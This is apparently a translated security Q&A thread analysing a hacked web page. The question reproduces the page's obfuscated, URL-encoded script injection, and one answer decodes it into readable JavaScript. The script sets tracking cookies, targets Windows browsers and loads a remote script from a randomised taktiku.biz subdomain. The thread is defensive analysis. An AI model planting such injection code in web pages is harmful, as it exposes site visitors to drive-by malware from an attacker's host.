Página HTML hackeada: ¿qué hay en el comentario después del código ofuscado?

Navega tus respuestas
2

Chrome solo me advirtió sobre el contenido malicioso al visitar un sitio, así que lo visité.

El código fuente es como el siguiente: 

<html>
<head>
<link href="images/DPT2.ico" title="Dynamic PowerTrainer Manager" rel="shortcut icon">
<title>Dynamic PowerTrainer Manager</title>
</head>
<frameset rows="94,*" border="0" frameborder="0" framespacing="0">  <!-- Frameset-Definition -->
  <frame src="header.jsp" name="header"  frameborder="0" marginwidth="0" marginheight="0" noresize>
  <frame src="login.jsp" name="main"  frameborder="0" marginwidth="0" marginheight="0" noresize>

  <noframes>
    Your browser doesn't support frames. You can not see this page.
  </noframes>
</frameset>
<ad><script type='text/javascript'>document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%61%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%70%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%70%22%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%76%61%72%20%62%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%2C%63%3D%22%20%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2C%64%3D%6E%75%6C%6C%2C%65%3D%30%2C%66%3D%30%3B%69%66%28%63%2E%6C%65%6E%67%74%68%3E%30%29%7B%65%3D%63%2E%69%6E%64%65%78%4F%66%28%22%20%68%6F%70%3D%22%29%3B%69%66%28%65%21%3D%2D%31%29%7B%65%2B%3D%35%3B%66%3D%63%2E%69%6E%64%65%78%4F%66%28%22%3B%22%2C%65%29%3B%69%66%28%66%3D%3D%2D%31%29%66%3D%63%2E%6C%65%6E%67%74%68%3B%64%3D%75%6E%65%73%63%61%70%65%28%63%2E%73%75%62%73%74%72%69%6E%67%28%65%2C%66%29%29%7D%7D%20%69%66%28%64%3D%3D%22%68%6F%70%22%26%26%62%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%26%26%61%2E%69%6E%64%65%78%4F%66%28%22%68%69%70%22%29%3D%3D%2D%31%29%7B%76%61%72%20%67%3D%5B%22%6B%65%67%22%2C%22%6B%65%69%22%2C%22%6B%65%6E%22%2C%22%6B%65%70%22%2C%22%6B%65%76%22%2C%22%6B%65%78%22%2C%22%6B%65%79%22%2C%22%6B%68%69%22%2C%22%6B%69%64%22%2C%22%6B%69%66%22%5D%2C%68%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%67%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%38%45%37%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%69%70%3D%22%2B%65%73%63%61%70%65%28%22%68%69%70%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%67%5B%68%5D%2B%27%2E%5C%78%37%34%5C%78%36%31%5C%78%36%62%5C%78%37%34%5C%78%36%39%5C%78%36%62%5C%78%37%35%5C%78%32%65%5C%78%36%32%5C%78%36%39%5C%78%37%61%2F%68%65%6C%70%2F%64%61%74%61%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ad>
<b1><!--8m3vp_oyeNrTzy8o0S/Jz01OLNEvT01KLCgo1k8pKMlNzEtMTy3Sz8lPz8yLTytKzE3VyyousLW1NTQ0NTY0NjQzMgcAmuYUjw==--></b1></body></html>

Soy consciente de la cadena ofuscada: son algunas cosas de javascript, jugar con cookies y cargar un script externo desde taktiku.biz

¿Pero cuál es el significado de String 8m3vp_oyeNrTzy8o0S/Jz01OLNEvT01KLCgo1k8pKMlNzEtMTy3Sz8lPz8yLTytKzE3VyyousLW1NTQ0NTY0NjQzMgcAmuYUjw== ? O bien: ¿existen motivos comunes para colocar una cadena de este tipo en las páginas inyectadas?

    
pregunta stuXnet 16.04.2014 - 13:31
fuente

2 respuestas

0

Parece ser algo agregado por un bot malicioso que está instalado en el servidor. Consulte Strange < b1 > Etiqueta HTML en los foros de PhpFreaks. Incluye algunos consejos sobre cómo eliminar el malware.

La línea 

<b1><!--8m3vp_oyeNrTzy8o0S/Jz01OLNEvT01KLCgo1k8pKMlNzEtMTy3Sz8lPz8yLTytKzE3Vyyo‌​usLW1NTQ0NTY0NjQzMgcAmuYUjw==--></b1>

también ha sido agregado por el malware. Sin embargo, la publicación del foro no tiene una respuesta concluyente para lo que es ... Puede que esté codificada con credenciales de FTP para que el código JavaScript que se descargue de taktiku.biz pueda usarlo para cargar más archivos en el servidor.

    
respondido por el Steven Volckaert 16.04.2014 - 13:58
fuente
2

Al mirar el JavaScript que está escrito en el documento, no veo nada que acceda al comentario.

El código de JavaScript: 
var a = document.cookie; document.cookie = "hop=" + escape("hop") + ";path=/"; var b = navigator.appVersion,
    c = " " + document.cookie,
    d = null,
    e = 0,
    f = 0; if (c.length > 0) {
    e = c.indexOf(" hop=");
    if (e != -1) {
        e += 5;
        f = c.indexOf(";", e);
        if (f == -1) f = c.length;
        d = unescape(c.substring(e, f))
    } } if (d == "hop" && b.toLowerCase().indexOf("win") != -1 && a.indexOf("hip") == -1) {
    var g = ["keg", "kei", "ken", "kep", "kev", "kex", "key", "khi", "kid", "kif"],
        h = Math.floor(Math.random() * g.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 8E7);
    document.cookie = "hip=" + escape("hip") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://'+g[h]+'.\x74\x61\x6b\x74\x69\x6b\x75\x2e\x62\x69\x7a/help/data.js"><\/script>') };

Entonces, sospecho que la cadena en el comentario simplemente se parece a Base64 pero en realidad no hace nada, y puede solo se han puesto para molestar a los investigadores de seguridad porque no pueden descifrarlo.

De todos modos, escribí un poco de JavaScript que elimina los caracteres del principio de la cadena y lo decodifica si es Base64 válido; sin embargo, solo aparece con texto ilegible. 

var str=prompt();while(str.length){
  try{
    var decoded=atob(str);
    prompt("Base64 string "+str+" decoded:",decoded);
  }
  catch(ex){

  }
  str=str.substring(1)
}

Por supuesto, la cadena también puede ser algún tipo de identificador usado por el creador de malware, o usado de alguna otra manera.

Tampoco puedo descartar la posibilidad de que se trate de datos cifrados, ya que un buen cifrado produce datos que parecen completamente aleatorios.

    
respondido por el user2428118 16.04.2014 - 14:00
fuente

Lea otras preguntas en las etiquetas

Cifrado a nivel de campo vs cifrado de disco para el cumplimiento de PCI ¿Se puede infectar un Ubuntu live usb con spyware / virus?